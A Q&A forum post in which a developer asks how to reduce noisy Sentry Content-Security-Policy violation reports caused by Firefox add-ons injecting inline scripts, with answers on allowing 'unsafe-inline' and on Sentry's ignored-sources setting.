I am using hash-based script-src
CSP(v2), together with Sentry's report-uri
in my site.
Recently I am getting lots of CSP violation report, specifically from latest version of Firefox (version 66 as of writing), creating lots of noise.
Recently Blocked 'script' from 'inline:'
Testing with a firefox installation on my own computer, I found out that many addons actually inject inline script into DOM, thus triggering CSP error.
It is possible to ignore/mitigate this problem via CSP rule, or can I ignore all these firefox entries somehow via sdk or dashboard settings?
You can allow 'unsafe-inline'
as a source, although doing so significantly weakens the security offered by CSP. (If you need to use unsafe-inline, I believe you have to NOT use the hash, as the hash supersedes the 'inline' directive.)
I received an answer from Sentry customer service:
"You can ignore these by going into your project's settings, then Security Headers > CSP Instructions > 'Additional ignored sources'
, and paste in the blocked_uri
value from the Event's CSP Report."
In this case the blocked_uri
value would be inline
. Note that it will ignore all inline
report, not just from firefox, but this is good enough for my problem.
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.